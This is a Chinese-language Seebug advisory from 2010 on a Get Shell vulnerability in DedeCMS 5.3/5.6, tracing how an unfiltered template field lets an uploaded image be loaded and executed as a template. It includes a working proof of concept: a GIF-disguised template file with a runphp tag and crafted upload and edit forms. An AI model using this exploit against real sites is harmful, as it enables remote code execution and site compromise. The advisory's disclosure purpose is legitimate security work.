DEDECMS网站管理系统Get Shell漏洞

2010-08-18T00:00:00
ID SSV:20049
Type seebug
Reporter Root
Modified 2010-08-18T00:00:00

Description

DedeCms 基于PHP+MySQL技术开发,支持Windows、Linux、Unix等多种服务器平台,自2004年发布第一个版本以来,至今已经发布了五个大版本。DedeCms以简单、健壮、灵活、开源几大特点占领了国内CMS的大部分市场,目前已经有超过二十万个站点正在使用DedeCms或基于DedeCms核心,是目前国内应用最广泛的PHP类CMS系统。

article_add.php

  1. ........................
  2. else if($dopost=='save')
  3. {
  4. include(DEDEMEMBER.'/inc/archives_check.php');
  5. //分析处理附加表数据
  6. $inadd_f = $inadd_v = '';
  7. if(!emptyempty($dede_addonfields))
  8. {
  9. $addonfields = explode(';',$dede_addonfields);
  10. ............................................ //省略部份代码
  11. $inadd_f .= ','.$vs[0];
  12. $inadd_v .= " ,'".${$vs[0]}."' ";
  13. }
  14. }
  15. }
  16. ..........................................
  17. $addtable = trim($cInfos['addtable']);
  18. if(emptyempty($addtable))
  19. {
  20. ......................................
  21. }
  22. else
  23. {
  24. $inquery = "INSERT INTO {$addtable}(aid,typeid,userip,redirecturl,templet,body{$inadd_f}) Values('$arcID','$typeid','$userip','','','$body'{$inadd_v})";
  25. if(!$dsql->ExecuteNoneQuery($inquery))
  26. {
  27. ..........................................
  28. }
  29. }
  30. ..........................................
  31. $artUrl = MakeArt($arcID,true); //利用地方(arc.archives.functions.php有定义)
  32. function MakeArt($aid,$ismakesign=false)
  33. {
  34. global $cfg_makeindex,$cfg_basedir,$cfg_templets_dir,$cfg_df_style;
  35. include_once(DEDEINC.'/arc.archives.class.php');
  36. if($ismakesign)
  37. {
  38. $envs['makesign'] = 'yes';
  39. }
  40. $arc = new Archives($aid);
  41. $reurl = $arc->MakeHtml(); //arc.archives.class.php有定义
  42. ............................
  43. }

arc.archives.class.php

  1. class Archives
  2. {
  3. ................
  4. function __construct($aid)
  5. {
  6. ............
  7. if($this->ChannelUnit->ChannelInfos['addtable']!='')
  8. {
  9. $query = "SELECT * FROM {$this->ChannelUnit->ChannelInfos['addtable']} WHERE aid = '$aid'";
  10. $this->addTableRow = $this->dsql->GetOne($query);
  11. }
  12. ........................
  13. if($this->ChannelUnit->ChannelInfos['addtable']!='' && $this->ChannelUnit->ChannelInfos['issystem']!=-1)
  14. {
  15. if(is_array($this->addTableRow))
  16. {
  17. ...............................
  18. $this->Fields['templet'] = $this->addTableRow['templet'];//注意1
  19. ......................................
  20. }
  21. }
  22. .............................
  23. }
  24. function MakeHtml($isremote=0)
  25. {
  26. global $cfg_remote_site,$fileFirst;
  27. if($this->IsError)
  28. {
  29. return '';
  30. }
  31. $this->Fields["displaytype"] = "st";
  32. //预编译$th
  33. $this->LoadTemplet(); //触发1
  34. ......................................//省略部份代码
  35. $this->ParseDMFields($i,1);
  36. $this->dtp->SaveTo($truefilename); //触发2
  37. ......................................
  38. }
  39. 继续跟进(触发1)$this->LoadTemplet(); //arc.archives.class.php有定义
  40. function LoadTemplet()
  41. {
  42. if($this->TempSource=='')
  43. {
  44. $tempfile = $this->GetTempletFile(); //注意2
  45. if(!file_exists($tempfile) || !is_file($tempfile))
  46. {
  47. echo "文档ID:{$this->Fields['id']} - {$this->TypeLink->TypeInfos['typename']} - {$this->Fields['title']}<br />";
  48. echo "模板文件不存在,无法解析文档!";
  49. exit();
  50. }
  51. $this->dtp->LoadTemplate($tempfile); //触发3
  52. $this->TempSource = $this->dtp->SourceString;
  53. }
  54. else
  55. {
  56. $this->dtp->LoadSource($this->TempSource);
  57. }
  58. }
  59. 再看注意2中的$this->GetTempletFile() //arc.archives.class.php有定义
  60. function GetTempletFile()
  61. {
  62. global $cfg_basedir,$cfg_templets_dir,$cfg_df_style;
  63. $cid = $this->ChannelUnit->ChannelInfos['nid'];
  64. if(!emptyempty($this->Fields['templet'])) //注意3
  65. {
  66. $filetag = MfTemplet($this->Fields['templet']);
  67. if( !ereg('/', $filetag) ) $filetag = $GLOBALS['cfg_df_style'].'/'.$filetag;
  68. }
  69. else
  70. {
  71. $filetag = MfTemplet($this->TypeLink->TypeInfos["temparticle"]);
  72. }
  73. .......................................
  74. if($cid=='spec')
  75. {
  76. if( !emptyempty($this->Fields['templet']) )
  77. {
  78. $tmpfile = $cfg_basedir.$cfg_templets_dir.'/'.$filetag;
  79. }
  80. else
  81. {
  82. $tmpfile = $cfg_basedir.$cfg_templets_dir."/{$cfg_df_style}/article_spec.htm";
  83. }
  84. }
  85. ...........................................
  86. return $tmpfile;
  87. }

注意3中的值来自注意1,而注意1的值是通过查表得来的;控制了它就等于控制了任意模板路径,然后通过触发3来触发漏洞。下面看一下怎么控制注意1的值(article_edit.php):

  1. ......................
  2. else if($dopost=='save')
  3. { ....................
  4. if(!emptyempty($dede_addonfields))
  5. {
  6. $addonfields = explode(';',$dede_addonfields);
  7. if(is_array($addonfields))
  8. {
  9. ........................
  10. ${$vs[0]} = GetFieldValueA(${$vs[0]},$vs[1],$aid);
  11. $inadd_f .= ','.$vs[0]." ='".${$vs[0]}."' ";
  12. }
  13. }
  14. ...................
  15. if($addtable!='')
  16. {
  17. $upQuery = "Update $addtable set typeid='$typeid',body='$body'{$inadd_f},userip='$userip' where aid='$aid' ";
  18. if(!$dsql->ExecuteNoneQuery($upQuery))
  19. {..............
  20. }
  21. }
  22. ....................
  23. }

$dede_addonfields来自请求且没有经过过滤(未按频道允许的附加字段校验),因此可以构造$inadd_f为 ,templet='上传的模板图片地址' ;该图片作为模板被包含后,再通过触发2生成图片里的后门。

DEDECMS 5.3/5.6 厂商补丁: DEDECMS


目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://www.dedecms.com/

                                        
                                            
                                                 Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
保存为1.gif

   1.  &lt;form action=&quot;http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot; &quot;&gt;  
   2. &lt;input type=&quot;hidden&quot; name=&quot;aid&quot; value=&quot;7&quot; /&gt;  
   3. &lt;input type=&quot;hidden&quot; name=&quot;mediatype&quot; value=&quot;1&quot; /&gt;  
   4. &lt;input type=&quot;text&quot; name=&quot;oldurl&quot; value=&quot;/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif&quot; /&gt;&lt;/br&gt;  
   5. &lt;input type=&quot;hidden&quot; name=&quot;dopost&quot; value=&quot;save&quot; /&gt;  
   6. &lt;input name=&quot;title&quot; type=&quot;hidden&quot; id=&quot;title&quot; value=&quot;1.jpg&quot; class=&quot;intxt&quot;/&gt;  
   7. &lt;input name=&quot;addonfile&quot; type=&quot;file&quot; id=&quot;addonfile&quot;/&gt;  
   8. &lt;button class=&quot;button2&quot; type=&quot;submit&quot; &gt;更改&lt;/button&gt;  
   9. &lt;/form&gt;  

构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
发表文章,然后构造修改表单如下:
 
 

   1. &lt;form  action=&quot;http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;  
   2. &lt;input type=&quot;hidden&quot; name=&quot;dopost&quot; value=&quot;save&quot; /&gt;  
   3. &lt;input type=&quot;hidden&quot; name=&quot;aid&quot; value=&quot;2&quot; /&gt;  
   4. &lt;input type=&quot;hidden&quot; name=&quot;idhash&quot; value=&quot;ec66030e619328a6c5115b55483e8dbd&quot; /&gt;  
   5. &lt;input type=&quot;hidden&quot; name=&quot;channelid&quot; value=&quot;1&quot; /&gt;  
   6. &lt;input type=&quot;hidden&quot; name=&quot;oldlitpic&quot; value=&quot;&quot; /&gt;  
   7. &lt;input type=&quot;hidden&quot; name=&quot;sortrank&quot; value=&quot;1282049150&quot; /&gt;     
   8. &lt;input  name=&quot;title&quot; type=&quot;text&quot; id=&quot;title&quot; value=&quot;aaaaaaaaaaaaaaa&quot; maxlength=&quot;100&quot; class=&quot;intxt&quot;/&gt;  
   9. &lt;input type=&quot;text&quot; name=&quot;writer&quot; id=&quot;writer&quot; value=&quot;123456&quot; maxlength=&quot;100&quot; class=&quot;intxt&quot; style=&quot;width:219px&quot;/&gt;  
  10. &lt;select name='typeid' size='1'&gt;  
  11. &lt;option value='1' class='option3' selected=''&gt;Test&lt;/option&gt;  
  12. &lt;select name='mtypesid' size='1'&gt;  
  13. &lt;option value='0' selected&gt;请选择分类...&lt;/option&gt;  
  14. &lt;option value='1' class='option3' selected&gt;aa&lt;/option&gt;&lt;/select&gt;   
  15. &lt;textarea name=&quot;description&quot; id=&quot;description&quot;&gt;aaaaaaaaaaaaa&lt;/textarea&gt;  
  16. &lt;input type='hidden' name='dede_addonfields' value=&quot;templet&quot;&gt;  
  17. &lt;input type='hidden' name='templet' value=&quot;../uploads/userup/3/1.gif&quot;&gt;  
  18. &lt;input type=&quot;hidden&quot; id=&quot;body&quot; name=&quot;body&quot; value=&quot;aaaa&quot; style=&quot;display:none&quot; /&gt;  
  19. &lt;button class=&quot;button2&quot; type=&quot;submit&quot;&gt;提交&lt;/button&gt;  
  20. &lt;/form&gt;